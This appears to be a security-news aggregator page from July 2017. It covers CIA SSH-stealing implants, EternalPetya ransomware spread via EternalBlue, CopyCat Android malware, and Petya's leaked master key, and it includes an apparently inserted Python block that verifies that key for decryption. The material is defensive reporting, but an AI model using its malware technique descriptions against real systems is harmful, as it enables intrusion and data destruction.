July 06, 2017

EFF Condemns Detentions at Turkish Digital Security Meeting

July 06, 2017 10:45 PM - EFF Deeplinks -

Turkish police officers in plainclothes yesterday raided a digital security training meeting on the island of Buyukuda in Istanbul, seizing equipment and detaining ten attendees, including Idil Eser, the director of Amnesty International Turkey. The human rights defenders are still being held in separate detention centers and were denied access to lawyers and the press for over 24 hours.

Amnesty's Turkey researcher reports that Eser faces at least seven days pre-trial detention under Turkish law; Global Voices Advocacy says the same for the other Turkish citizens arrested in the raid. The status of the trainers, who are from Germany and Sweden, is currently unknown.

EFF believes that everyone should be free to learn to protect themselves online and that this is information they have the right to share. Digital security trainings like this one are frequently held across the world to educate lawyers, journalists, and human rights advocates on how best to protect themselves and their communities. Teaching or learning these skills is certainly no grounds for detention. By conducting this raid, Turkey joins Iran and Ethiopia as countries where innocent citizens are intimidated and arrested simply for learning the basic principles of modern technology.

We join Amnesty International, HIVOS, Article 19, and the rest of the international human rights community in demanding that Turkish authorities release all the Buyukuda detainees, including the two digital security trainers, immediately.

Telecom Hacker Sentenced for Laundering Millions

July 06, 2017 10:20 PM - Dark Reading - Pakistani man sentenced to prison for hacking into PBX systems and generating millions of dollars via bogus premium phone calls and laundering the money.

Massive WWE Leak Exposes 3 Million Wrestling Fans’ Addresses, Ethnicities And More

July 06, 2017 09:50 PM - Office of Inadequate Security - Thomas Fox-Brewster reports: WWE fans take note: an IT error may have left your personal information open to anyone, including addresses, educational background, earnings and ethnicity. Earlier this week, Bob Dyachenko, from security firm Kromtech, told Forbes he’d uncovered a huge, unprotected WWE database containing information on more than 3 million users, noting it was open [...]

Notorious Russian Hacker With Links To FSB Scandal Sentenced To Prison

July 06, 2017 09:45 PM - Office of Inadequate Security - Mike Eckel reports: A notorious Russian hacker whose exploits and later arrest gave glimpses into the intersection of computer crime and Russian law enforcement has been sentenced to two years in prison. The Moscow City Court issued its ruling July 6 against Vladimir Anikeyev in a decision made behind closed doors, one indication of the [...]

Pakistani Man Sentenced for Laundering Millions in Telecom Hacking Scheme

July 06, 2017 09:33 PM - Office of Inadequate Security - A massive international hacking and telecommunications fraud scheme served as a backdrop for an FBI investigation that led to the capture of a Pakistani citizen who played a major role in scamming U.S. companies out of millions of dollars in fees. From November 2008 to December 2012, Muhammad Sohail Qasmani laundered more than $19.6 million [...]

Get 72% off NordVPN Virtual Private Network Service For a Limited Time - Deal Alert

July 06, 2017 09:05 PM - CSO Online -

NordVPN gives you a private and fast path through the public Internet. All of your data is protected every step of the way using revolutionary 2048-bit SSL encryption even a supercomputer can’t crack. Access Hulu, Netflix, BBC, ITV, Sky, RaiTV and much more from anywhere in the world. Unmetered access for 6 simultaneous devices. You're sure to find dozens of good uses for a VPN. Take advantage of the current 72% off deal that makes all of this available to you for just $3.29/month (access deal here). This is a special deal available for a limited time.

Photographer Attacked by Ludicrous Online Voting Patent

July 06, 2017 09:04 PM - EFF Deeplinks -

Ruth Taylor never expected that her hobby would get her sued for patent infringement. Her photography website, Bytephoto.com, barely made enough advertising revenue to cover hosting costs. The site hosts user-submitted photos and runs weekly competitions, decided by user vote, for the best. Ruth’s main business is her own photography. She supports that business by visiting more than a dozen local art festivals in Bucks County, Pennsylvania every year.

In 2007, almost four years after Bytephoto began running online photo competitions, a company called Garfum.com Corporation applied for a patent titled “Method of Sharing Multi-Media Content Among Users in a Global Computer Network.” The patent, U.S. Patent No. 8,209,618, takes the well-known concept of a competition by popular vote and applies it to the modern context of computer networks. On September 23, 2014, Garfum filed a federal lawsuit accusing Bytephoto of patent infringement for allowing its users to vote for their favorite photo.

Ruth didn’t understand how someone could patent online contests. “It seemed like a scam.”

Like many people sued for patent infringement, Ruth first learned of the case when a lawyer who had seen the complaint online called out of the blue, hoping to represent her. She was stunned. “It seemed like a scam,” she said. Ruth didn’t understand how someone could patent online contests. It just didn’t seem logical. A few days later, a process server arrived at her house to formally serve the complaint. Then Ruth knew it was real.

Garfum’s opening settlement demand was $50,000. This demand far exceeded Bytephoto’s annual revenue. Ruth learned that defending the case could easily cost more than a million dollars. Since Bytephoto was just a hobby, Ruth had never incorporated it. This meant she was personally on the hook. She faced the choice between paying the settlement and paying even higher litigation costs. This was especially frustrating because Bytephoto began allowing users to vote for their favorite photographs years before Garfum filed its patent application. You can’t patent what already exists. But proving this defense in court would take months of expensive discovery.

Fortunately for Ruth, Garfum’s lawsuit arrived after the Supreme Court’s decision in Alice v. CLS Bank. Many judges have allowed challenges under Alice to be filed early in the case rather than waiting for discovery (since the patent itself is the key evidence). EFF agreed to represent Ruth pro bono and filed a motion asking the court to hold the patent invalid under Alice. A few days before the hearing on that motion, Garfum voluntarily abandoned its suit.

Ruth’s case is a perfect example of why Alice improves the patent system. Garfum’s broad and abstract patent did nothing to promote innovation. The idea of voting has been around for centuries. The idea of applying voting to online social networks did not deserve patent protection. Indeed, even Ruth’s own website predated Garfum’s application. Yet a settlement or litigation expenses could quickly have led to the site being shut down. Fortunately, thanks to the Alice ruling, Ruth was able to defeat Garfum’s absurd claim and continue running her site and her business.

BrandPost: It’s Time to Get Serious About Web Application Security

July 06, 2017 09:02 PM - CSO Online -

Historically, IT teams have tended to deploy web application firewalls (WAFs) simply to comply with Payment Card Industry Data Security Standards (PCI DSS). If this is the case in your organization, whether you are a financial services provider or a retailer, it may be time to take another look at these valuable security tools. Many of today’s data security professionals are beginning to recognize that unprotected web applications have become attractive targets for cybercriminals looking for easy entry points into their networks.

The fact is, securing application environments presents a unique and consistent challenge to IT teams. Which is why 83 percent of enterprise IT executives, according to a recent IDG survey, now believe that application security is critical to their IT strategy.

Hacking the State of the ISIS Cyber Caliphate

July 06, 2017 08:55 PM - Dark Reading - Researchers say Islamic State's United Cyber Caliphate remains in its infancy when it comes to cyberattack expertise.

FL: Notice from Baptist Medical Center South to EEG Patients Regarding a Missing Hard Drive

July 06, 2017 08:49 PM - Office of Inadequate Security - Baptist Medical Center South (“Baptist South”) is committed to protecting the security and confidentiality of our patients’ information. Regrettably, this notice concerns an incident involving some of that information. On May 18, 2017, Baptist South learned that a backup hard drive used for EEG testing was missing from an EEG room. We immediately began [...]

Rethinking what it means to win in security

July 06, 2017 08:35 PM - CSO Online -

Are we winning at security right now?

Before you answer (too late, right?), take a moment to consider what it means to win. Less trick question and more a candid exploration of our collective mindset in security.

We remain flooded with headlines and conference talks that decry our losses and offer approaches for us to win. The constant negativity poisons our mindset to the point where we question if security even matters, if we matter.

To be certain, security matters. Increasingly, security matters. Which means you matter. The key is understanding what success for security leaders actually is.

Wikileaks: BothanSpy and Gyrfalcon CIA Implants steal SSH Credentials from Windows and Linux OSs

July 06, 2017 08:18 PM - Security Affairs -

WikiLeaks leaked documents detailing BothanSpy and Gyrfalcon CIA implants designed to steal SSH credentials from Windows and Linux OSs.

WikiLeaks has published a new batch of documents from the Vault7 dump detailing two new CIA implants allegedly used by the agency to intercept and exfiltrate SSH (Secure Shell) credentials from both Windows and Linux operating systems, using different attack vectors for each.

The first implant codenamed BothanSpy was developed to target Microsoft Windows Xshell client, the second one named Gyrfalcon was designed to target the OpenSSH client on various Linux distros, including CentOS, Debian, RHEL (Red Hat), openSUSE and Ubuntu.

BothanSpy and Gyrfalcon are able to steal user credentials for all active SSH sessions and then send them back to the CIA.

BothanSpy is installed as a Shellterm 3.x extension on the target machine; it only works when Xshell is running on that machine with active sessions.

Xshell is a terminal emulator that supports SSH, SFTP, TELNET, RLOGIN and SERIAL for delivering industry leading features including a tabbed environment, dynamic port forwarding, custom key mapping, user defined buttons, VB scripting, and UNICODE terminal for displaying 2 byte characters and international language support.

“BothanSpy only works if Xshell is running on the target, and it has active sessions. Otherwise, Xshell is not storing credential information in the location BothanSpy will search.” reads the user manual.

“In order to use BothanSpy against targets running a x64 version of Windows, the loader being used must support Wow64 injection. Xshell only comes as a x86 binary, and thus BothanSpy is only compiled as x86. Shellterm 3.0+ supports Wow64 injection, and Shellterm is highly recommended.”

The Gyrfalcon implant works on Linux systems (32- or 64-bit kernel); for persistent access, CIA operators use a custom rootkit dubbed JQC/KitV.

The implant can collect full or partial OpenSSH session traffic and stores the stolen information in a local encrypted file for later exfiltration.

“Gyrfalcon is an SSH session “sharing” tool that operates on outbound OpenSSH sessions from the target host on which it is run. It can log SSH sessions (including login credentials), as well as execute commands on behalf of the legitimate user on the remote host.” reads the user manual of Gyrfalcon v1.0.

“The tool runs in an automated fashion. It is configured in advance, executed on the remote host and left running. Some time later, the operator returns and commands gyrfalcon to flush all of its collection to disk. The operator retrieves the collection file, decrypts it, and analyzes the collected data”

WikiLeaks also published the user guide for Gyrfalcon v2.0; this version of the implant is composed of two compiled binaries that the operator must upload to the target platform.

[Image: BothanSpy and Gyrfalcon]

“The target platform must be running the Linux operating system with either 32- or 64-bit kernel and libraries. Gyrfalcon consists of two compiled binaries that should be uploaded to the target platform along with the encrypted configuration file.” continues the manual.

“Gyrfalcon does not provide any communication services between the local operator computer and target platform. The operator must use a third-party application to upload these three files to the target platform.”

Below is the list of releases published by WikiLeaks since March:

Pierluigi Paganini

(Security Affairs – BothanSpy and Gyrfalcon, CIA)

The post Wikileaks: BothanSpy and Gyrfalcon CIA Implants steal SSH Credentials from Windows and Linux OSs appeared first on Security Affairs.

Let’s Encrypt to Offer Wildcard Certificates in 2018

July 06, 2017 08:04 PM - Threatpost - Certificate authority Let's Encrypt said this week it will begin offering wildcard certificates in 2018.

Report: Second quarter dominated by ransomware outbreaks

July 06, 2017 07:06 PM - Malwarebytes Unpacked -

The second quarter of 2017 brought ransomware to unprecedented levels, with worldwide outbreaks that went almost out of control. In scenarios reminiscent of yesteryear's worms, WannaCry created global panic as it used a critical vulnerability in the SMBv1 protocol to propagate like wildfire.

Within hours, hundreds of thousands of machines in over 150 countries were infected and as investigations into the attacks went on, it was discovered that other threat actors had also been leveraging the leaked government-created exploits.

Ransomware continued to be the most distributed type of malware, topping 70% of all threats in June with the likes of Cerber, Troldesh, and Jaff. Interestingly, we witnessed other payloads delivered alongside ransomware, infecting users with Cerber, Kovter, Nymaim, and Boaxxe all at once.

In this report, we will provide a quick update on the ransomware that does not want to die off, namely Locky, and also review the latest outbreak with the rebranded Petya that wreaked havoc in Ukraine and affected several multinational companies.

With all this ransomware buzz, we can’t forget about the “other threats” which, as a matter of fact, were also somewhat influenced by the aforementioned events. Malvertising was the major engine behind drive-by download attacks that leveraged various exploit kits, most notably RIG EK, Magnitude EK and Astrum EK.

We noted new and somewhat unexpected tech support scam campaigns, for instance using spam and fake Amazon notifications. Typically those come with malicious attachments, but in this instance they contained links that ultimately locked up the user’s browser and urged them to dial the so-called Microsoft technicians.

Finally, this report wouldn’t be complete without our usual Researcher Spotlight section, featuring Jean-Philippe ‘Tinfoil Hat’ Taggart.

Download full report here

Thanks for reading and safe surfing!

The post Report: Second quarter dominated by ransomware outbreaks appeared first on Malwarebytes Labs.

Wikileaks Unveils CIA Implants that Steal SSH Credentials from Windows & Linux PCs

July 06, 2017 06:41 PM - The Hacker News - WikiLeaks has today published the 15th batch of its ongoing Vault 7 leak, this time detailing two alleged CIA implants that allowed the agency to intercept and exfiltrate SSH (Secure Shell) credentials from targeted Windows and Linux operating systems using different attack vectors. Secure Shell or SSH is a cryptographic network protocol used for remote login to machines and servers securely

New Google Security Controls Tighten Third-Party Data Access

July 06, 2017 06:35 PM - Dark Reading - Google adds OAuth app whitelisting to G Suite so admins can vet third-party applications before users can grant them authorized data access.

4 Key Identity and Access Management Priorities and Investment Drivers

July 06, 2017 06:35 PM - CSO Online -

What drives your decisions around identity and access management (IAM)? According to the 2016 IDC Global Identity Management Assessment Survey, if you’re looking at an IAM solution, you’re likely most interested in one of four things: how effective a solution is, how it affects compliance, how much it simplifies IAM, or how much it costs. Four different buyers with four different priorities, to be sure—but also with a whole lot in common when it comes to solution drivers.

Whatever your priority as a buyer, there’s one decision driver that’s very likely near the top of your list: strengthening identity and access security. On a scale of 1-100, buyers who focused on efficacy and buyers who focused on compliance both scored at 75. Buyers who focused on simplification also scored relatively high at 64. That’s nearly as high as they scored their top priority of efficacy and compliance.

Sabre Breach Investigation Concludes with Impact Limited

July 06, 2017 06:30 PM - Dark Reading - The travel company finds that attackers gained limited access to a subset of its bookings in its reservation system.

CopyCat Malware Infects 14 Million Android Devices

July 06, 2017 06:30 PM - Dark Reading - A new malware strain is discovered with a novel approach to infecting Android handheld devices with adware.

IDG Contributor Network: These are the good ol' days of cybersecurity

July 06, 2017 06:30 PM - CSO Online -

One thing is an absolute truism of cybersecurity: it is one of the fastest changing realms currently known to humanity, and one that we are unable to predict. Cybersecurity is like earthquakes. We know that one is coming sometime in the future, but we don’t know where or when it will hit, what magnitude it will be, or what kind of destruction it will bring. 

As bad as things might seem right now with the most current ransomware, we are going to look back on these days and think “It was so easy to protect ourselves back then, and we didn’t realize it.” The future will bring new challenges. From my vantage point of working with many different clients and speaking with many different security practitioners, here are my prognostications of things to come:

3 Tips to Get the Most Out of Black Hat/Defcon

July 06, 2017 06:21 PM - CSO Online -

Las Vegas. Hate it or love it, for seven days each year Sin City is the gathering place for BSides Las Vegas, Black Hat, and DEF CON. Combined, these events are arguably the largest security gathering in North America, with professionals and enthusiasts both in attendance. Here's how to get the most out of your trip to the desert this summer.

Relax, let the conference do the work for you:

Among the three conferences, you'll be surrounded by upwards of 30,000 people or more during the week. This can present a bit of a hassle when it comes to time management.

The best way to deal with this is to make plans ahead of time … and stick to them. Start by looking at the talk outlines and see who is presenting. The DEF CON speakers list is available here, and the Black Hat list is here. At the time this article was written, the BSides Las Vegas schedule was not available. Edit: The BSides Las Vegas schedule is online, and can be found here.

All this EternalPetya stuff makes me WannaCry

July 06, 2017 06:15 PM - Malwarebytes Unpacked -

Another week goes by and yet again we have another ransomware outbreak initially dropped by a malicious software update and eventually spreading within internal networks using several methods – including EternalBlue – the leaked exploit from the ShadowBrokers group.

Security researchers can’t seem to catch a break when it comes to holidays and significant malware variants being unleashed to the wild. While many of us may have been enjoying the nice summer holiday or celebrating American Independence Day by blowing up small pieces of it, @hasherezade was hard at work deconstructing this particular piece of code and filling us in on the technical details and discoveries as they were being made.

We’ll take what we know and what we’ve learned and try to summarize the mind-boggling technical information into a simple structure that even my dear mother will be able to understand (love you, Mom!).

So what happened?

Sometime prior to June 27th, Ukrainian software company M.E.Doc was reportedly infiltrated by an unknown group of hackers. The attackers managed to remain undetected within the company network for an (as of yet) unknown period of time and were able to leverage a number of resources to eventually grant themselves access to the source code and update mechanisms of the widely used M.E.Doc software.

M.E.Doc makes and distributes accounting software that is targeted primarily towards Ukrainian residents and business entities, as well as a few others outside of the national boundaries. There are reports that this software is government mandated within Ukraine, although we can find no factual reference for this claim. Regardless, the software is used by a significant percentage of the Ukrainian population and a number of organizations outside of Ukraine.

Using the system-wide access afforded with the previous breach of the M.E.Doc system, the attackers were able to spend some time to understand the network infrastructure and to become familiar with the M.E.Doc source code.

On June 27th, the attackers used the software update mechanisms of the M.E.Doc software to distribute a newly compiled version of the popular accounting software that contained malicious code which infected systems with a ransomware variant. Any system configured to automatically perform updates would have been infected without any user interaction required.

Once infection occurs, the code is configured to use the same EternalBlue and DoublePulsar modules that were used in the WannaCry incident to spread to other vulnerable systems on the network. This allows the malicious code to infect not only machines utilizing the M.E.Doc software but also any other machine on the network.

In addition to EternalBlue and DoublePulsar, third-party researchers uncovered the use of an additional NSA-derived exploit, EternalRomance, being used to infect any machine that connects to the affected network. This particular exploit uses two built-in Windows administrative tools, PsExec and WMI, to help execute malware on remote connections. In essence, this allows the malware to infect every machine it can reach, which would include any home machine connected to the enterprise server via VPN.

After susceptible machines have been infected with the ransomware, the Master File Table (MFT) and the Master Boot Record (MBR) of the computer are encrypted and the MBR is overwritten to display the ransom note.

[Image: ransom note]

Both the Master File Table and the Master Boot Record tell the PC what to do after the power button is pressed and where important files are located on disk. Without both of them intact, a computer cannot boot properly.

Why the strange name for the malware?

As researchers began understanding the code, all sorts of various names were thrown out as a means to name the malware family. NotPetya, Expetr, EternalPetya, and even simply Petya have all been used to describe the malware. It seems strange that so many researchers came up with a similar naming convention, but here is where this particular infection gets interesting.

This specific methodology of infection is synonymous with the Petya ransomware family. Furthermore, the language of the ransom note, plus information within the decompiled malware code led researchers to initially suspect the same malware author had been responsible for both variants. But as researchers further dissected the code, a few key differences began to emerge.

First, EternalPetya differs from Petya in that the newly discovered code uses the NSA-derived EternalBlue, DoublePulsar, and EternalRomance modules to spread to connected machines on the network. This would be a new evolution in the propagation methodology of the original Petya.

Second, the malware appeared to be an edited version of the Petya ransomware rather than a newly compiled version. @hasherezade did a terrific job of breaking this all down in the post titled EternalPetya Yet Another Stolen Piece in the package.

In the post, @hasherezade explains that the original Petya ransomware code has been craftily modified, rather than compiled from scratch, to allow reuse of previous malware code. This has a number of advantages for the new author, such as a decreased workload compared with writing ransomware from the ground up and helping to misdirect attribution by (among other things) excluding possible language clues that we have seen with other strains.

Third, the self-proclaimed author of the original Petya ransomware family, @JanusSecretary, posted to a dormant Twitter account, claiming: “we’re back havin a look in “notpetya” maybe it’s crackable with our privkey”

[Image: Janus tweet]

This, along with the information that the original malware had been edited rather than compiled, leads to the conclusion that Janus was not likely involved with the dissemination of the code, but rather merely a scapegoat for the EternalPetya authors.

If not @JanusSecretary, who can we blame?

As is typical with these sorts of malicious malware strains, attribution can be difficult if not impossible. Malware authors take significant steps to cover their tracks and utilize a number of anonymizing services to hide their origin, intent, and methodologies.

Tor, proxies, and VPNs are used to conceal identifying connection information. Bitcoin and other digital currencies are used to conceal payment information. Cryptocurrency tumblers are used to mix up digital currency transactions, thus confusing the trail back to the original source. And in at least this case, a well-known ransomware family was ripped off as a means to implicate the original author.

While we can’t fully rule out involvement in EternalPetya by @JanusSecretary, the information indicates this is probably not the case. There would have been no need to go through the trouble of modifying the original malware variant when a new variant could more easily have been compiled from the new information.

So who else could it have been?

It’s all the rage these days to blame Russia for any and everything related to malicious activity and the Ukrainian government wasted no time in doing so.

On July 1st, the Ukraine State Security Service, SBU, claimed that the same hackers who attacked its power grid in December 2016 were also responsible for the EternalPetya outbreak. The Ukrainian government was quick to blame Russia for the EternalPetya attack, but a spokesman for the Kremlin dismissed the claims as “unfounded blanket accusations”. The Russian government also pointed out that its own companies were impacted by the attack including Russia’s state-owned oil company, Rosneft, and Russian steel maker, Evraz.

Indeed, we have found no indications that EternalPetya was a Russian or state-sponsored attack, and we have seen no Indicators of Compromise (IOCs) to indicate otherwise.

Rather, the most plausible explanation is that a group of sophisticated attackers managed to gain access to a widely used software company and used that access to distribute a modified version of a known ransomware variant as a means to extort payments from infected users.

While this is little more than speculation at this point, all indicators point to this being the most plausible explanation.

[Image: repeated, unoptimized code is an indicator of re-use]

Can the encrypted files be retrieved?

In short, probably not. As with the WannaCry outbreak, the authors of this malware variant made some critical mistakes in the payment and decryption methodologies. As @hasherezade points out in the post titled EternalPetya and the lost Salsa20 key, ‘after being read and used for the encrypting algorithm, the stored Salsa key is erased from the disk’.

In previous Petya versions, the Salsa key, basically the key that can lock or unlock the contents, was encrypted with the attackers' public key and stored as an encoded string. This meant that although the Salsa key was erased from disk, as we’ve seen with EternalPetya, the key was still available to the attackers, who held the private key needed to decrypt it.

In essence, the authors of the EternalPetya variant erased the key that was vital in decrypting the files, thus leaving the decryption of files highly unlikely.

This flaw in the key handling is what caused the initial dispute over whether this particular variant should be called a ‘wiper’ or ‘ransomware’. Regardless of the designation, victims are paying a ransom in the hope of recovering their files. There is no guarantee that payment will restore files, and those who pay always gamble with this risk. This is, by definition, the behavior of ransomware.

In addition to that, the email address that the attackers configured the malicious code to display has since been terminated by the email provider. This leaves no ability for infected users to contact the attackers and arrange for the decryption of files.

So unless a future decryptor emerges that utilizes a master key or a flaw in the encryption routine, it remains unlikely that infected users have a means to restore their files.

So then, what’s next?

On July 3rd, the head of Ukraine’s Cyber Police suggested that M.E.Doc is under investigation and will potentially face charges related to the incident. As reported by APNews: Col. Serhiy Demydiuk, the head of Ukraine’s National Cyber Police unit, said in an interview with The Associated Press that Kiev-based M.E. Doc’s employees had blown off repeated warnings about the security of their information technology infrastructure.

“They knew about it,” he told the AP. “They were told many times by various anti-virus firms. … For this neglect, the people in this case will face criminal responsibility.”

On July 4th, Ukrainian federal police seized several computer servers used by M.E.Doc. Video quickly appeared online reportedly showing the Ukrainian federal police storming the M.E.Doc facility and establishing control over the property. While I admittedly don’t speak Ukrainian, and for all I know these guys could be talking about rescuing kittens, I believe this video to accurately depict the raid on the M.E.Doc facility.

Additionally, as of this writing, the M.E.Doc website is offline, as are the other domains hosted on the same IP address. For all intents and purposes, at least for the time being, M.E.Doc may be done operating as a software vendor.

Current M.E.Doc users should neither run nor upgrade the software until further notice, but given the confiscation of the M.E.Doc servers, I’m not sure users should hold their breath waiting for that notice.

What did we learn?

Apparently, we learned little from the WannaCry outbreak of months past. While the compromise of the M.E.Doc servers provided a novel distribution method, the continued success of the NSA-derived exploits leaves little excuse for the infection of network-connected machines.

It is getting difficult to have sympathy for apathetic IT admins who have failed to apply the available updates for the vulnerabilities targeted by the EternalBlue and EternalRomance exploits (and the DoublePulsar implant they install). These issues have been thoroughly discussed and have garnered worldwide attention.

Mitigation techniques exist for all of the exploit-driven distribution methods, ranging from applying Microsoft’s update for these SMB flaws (MS17-010) to disabling SMBv1, or SMB entirely, where it is not needed.

We could tell those IT admins that, had they been running Malwarebytes Endpoint Protection, which includes anti-exploit and anti-ransomware technologies, their users would have been protected from this sort of attack – but honestly, I’m not sure they would listen even if we did.

So instead, we’ll direct our message to the loyal readers of this blog and to people like my dear mother, who need to understand that malicious attacks can come from any avenue and at any time. Never take the security of the data on your machine for granted: you may wake up one morning to find all of your most valuable documents either held for ransom or, worse, completely unrecoverable no matter how much money is paid.

Ensure that valuable documents are routinely backed up to offline or cloud storage. And use a reliable, technically advanced security product such as Malwarebytes to help protect your sensitive information and keep you from falling victim to this sort of devastating attack.

While it may not be the ideal solution, a strong defensive strategy is the best option in the current age of rapidly evolving, sophisticated malware that can destroy all of your most important files in a matter of seconds.

The post All this EternalPetya stuff makes me WannaCry appeared first on Malwarebytes Labs.

News in brief: Parliament hack ‘amateur attack’; ‘Humpty Dumpty’ in great fall; Google faces more EU fines

July 06, 2017 05:56 PM - Naked Security - Your daily round-up of some of the other stories in the news

CopyCat Malware Infected 14M Android Devices, Rooted 8M, in 2016

July 06, 2017 05:49 PM - Threatpost - Over the course of two months last year the Copycat malware infected 14 million Android devices and rooted more than half of them, roughly eight million devices.

TN: Ransomware hits one Tennessee city’s emergency services

July 06, 2017 05:46 PM - Office of Inadequate Security - AP reports: Two branches of a Tennessee city’s emergency services have been hit by ransomware as part of a worldwide malware attack that began in May. […] Norville says most of the affected data is not retrievable, and it is unclear if any significant files have been lost. Two file servers and 19 computers within [...]

CopyCat Android Rooting Malware Infected 14 Million Devices

July 06, 2017 05:17 PM - The Hacker News - A newly uncovered malware strain has already infected more than 14 Million Android devices around the world, earning its operators approximately $1.5 Million in fake ad revenues in just two months. Dubbed CopyCat, the malware has capabilities to root infected devices, establish persistency, and inject malicious code into Zygote – a daemon responsible for launching apps on Android, providing

The key to old Petya versions has been published by the malware author

July 06, 2017 05:06 PM - Malwarebytes Unpacked -

As research has concluded, the original author of Petya, Janus, was not involved in the latest attacks on Ukraine. His original malware was pirated and extended by an unknown actor (read more here). As a result of the recent events, Janus has probably decided to shut down the Petya project. Like the authors of TeslaCrypt, he released his private key, allowing all victims of the previous Petya attacks to get their files back.

(The author of Petya has previously been known for leaking the keys of his rival, the Chimera ransomware – details here.)

[UPDATE] Researcher Anton Ivanov confirmed by his experiments that the key is authentic.

What exactly happened?

Yesterday, Janus made a public announcement on Twitter:

The message contained a link to a file hosted on the mega.nz service.

The linked file was encrypted and password protected:

After guessing the password and decrypting the package with openssl, I got the following plaintext:

Congratulations!
Here is our secp192k1 privkey:
38dd46801ce61883433048d6d8c6ab8be18654a2695b4723
We used ECIES (with AES-256-ECB) Scheme to encrypt the decryption password into the "Personal Code" which is BASE58 encoded.

This appears to be Janus’ private key for all the previous Petya versions.
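Before trusting a leaked key, a practitioner would check that it is a valid scalar for the stated curve and derive the public point to compare with the one embedded in the Petya/Goldeneye binaries. The following Python is an added example, not Janus’ or Malwarebytes’ code: it hard-codes the SEC 2 secp192k1 domain parameters, parses the hex string above, derives d*G, and shows the ECDH step that any ECIES decryptor for the “Personal Code” has to perform. The public key from the binaries is not reproduced on this page, so the final comparison is left to the reader; the KDF and AES-256-ECB stage of the ECIES scheme are not modelled here.

```python
# Added example (not from the post): sanity-check the published secp192k1 private key
# and show the ECDH step that an ECIES decryptor needs. Curve constants are the SEC 2
# secp192k1 domain parameters. The public key embedded in the Petya/Goldeneye binaries
# is not on the page, so the comparison against it is left to the reader.

# secp192k1: y^2 = x^3 + 3 over GF(P); generator G has prime order N, cofactor 1
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37
A = 0
B = 3
G = (0xDB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D,
     0x9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D)
N = 0xFFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D
INF = None  # point at infinity

# The key exactly as it appears in the decrypted announcement above
LEAKED_PRIVKEY_HEX = "38dd46801ce61883433048d6d8c6ab8be18654a2695b4723"


def on_curve(pt):
    """True if pt is the point at infinity or satisfies the curve equation."""
    if pt is INF:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine point addition (and doubling when p1 == p2) on secp192k1."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF                      # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, pt):
    """Double-and-add; fine for offline verification, not constant-time."""
    result, addend = INF, pt
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def parse_privkey(hex_str):
    """Reject anything that is not a 24-byte scalar in [1, N-1]."""
    raw = bytes.fromhex(hex_str)
    if len(raw) != 24:
        raise ValueError("secp192k1 private key must be 24 bytes, got %d" % len(raw))
    d = int.from_bytes(raw, "big")
    if not 1 <= d < N:
        raise ValueError("scalar out of range for secp192k1")
    return d


def derive_pubkey(hex_str):
    """Q = d*G: the point a decryptor would compare with the one in the binary."""
    return scalar_mult(parse_privkey(hex_str), G)


def ecies_shared_point(ephemeral_scalar, recipient_pub):
    """Sender side of ECIES key agreement: S = r*Q (R = r*G travels in the Personal Code)."""
    return scalar_mult(ephemeral_scalar, recipient_pub)


def ecies_recover_shared_point(privkey_hex, ephemeral_pub):
    """Recipient side: S = d*R. Owning d is exactly what makes the Personal Code decryptable."""
    return scalar_mult(parse_privkey(privkey_hex), ephemeral_pub)


if __name__ == "__main__":
    q = derive_pubkey(LEAKED_PRIVKEY_HEX)
    print("Q.x = %048x" % q[0])
    print("Q.y = %048x" % q[1])
```

If the printed Q does not match the public key extracted from a Petya/Goldeneye sample, the leaked scalar is not the one those binaries encrypted against, whatever the announcement says; the ECDH functions are there to show that, once Q matches, recovering the per-victim shared secret needs nothing beyond d and the ephemeral point carried in the Personal Code.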

Can it help in case of EternalPetya/NotPetya?

This key cannot help in the case of EternalPetya, since in that variant the Salsa keys are not encrypted with Janus’ public key but are instead erased and lost forever (read more). It can only help people who were attacked by Petya/Goldeneye in the past.

What is the value added by having this key?

Just to recall, the first version of Petya, Red Petya, was successfully cracked by leo_and_stone. Based on his work, various decryptors have been released, e.g. the antipetya live CD.

The error in the second version, a.k.a. Green Petya, which I revealed, was not as severe. Yet it allowed for writing a bruteforcer. Thanks to the GPU-based solution implemented by procrash, cracking the Salsa key was brought down to about 3 days.

Later versions fixed the flaws to the extent that cracking the Salsa key was no longer possible.

Thanks to the now-published master key, everyone who has preserved an image of a disk encrypted by the relevant versions of Petya may get a chance to recover their data.

Further research related to verifying the obtained material and building a decryptor is in progress. We will keep you updated, please stay tuned!

Appendix

Goldeneye – the last Petya version released by Janus:

Goldeneye Ransomware – the Petya/Mischa combo rebranded

 


This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going into the details of malware and sharing threat information with the community. Check her out on Twitter @hasherezade and on her personal blog: https://hshrzd.wordp.

The post The key to old Petya versions has been published by the malware author appeared first on Malwarebytes Labs.

Encryption thwarting investigators as federal government taps increase

July 06, 2017 05:02 PM - Naked Security - Annual wiretap report lifts the lid on crime investigation, revealing that the cost is rising sharply - and partly funded by drugs busts

FPCollab: Intelligence Sharing for Risk, Security and Business Leaders

July 06, 2017 05:00 PM - Flashpoint -

Information sharing in security and intelligence, as we all know, is critical to ensuring the success of defenders of both public and private organizations. This concept has become even more evident in the last twelve months following our expansion into Business Risk Intelligence (BRI). While traditional applications of cyber threat intelligence are largely tactical, indicator-centric, and designed specifically for cybersecurity teams, BRI’s strategic nature and focus on finished intelligence aims to help all business units mitigate widespread risk across a wide range of use cases.

But since addressing many of these use cases — from fraud and ransomware to supply chain vulnerabilities and insider threats — can be complex, challenging, and even unprecedented for many organizations, we knew we had to ensure that our customers and subject matter experts alike had timely, trusted, secure access to the latest information and leading expertise pertaining to such threats.

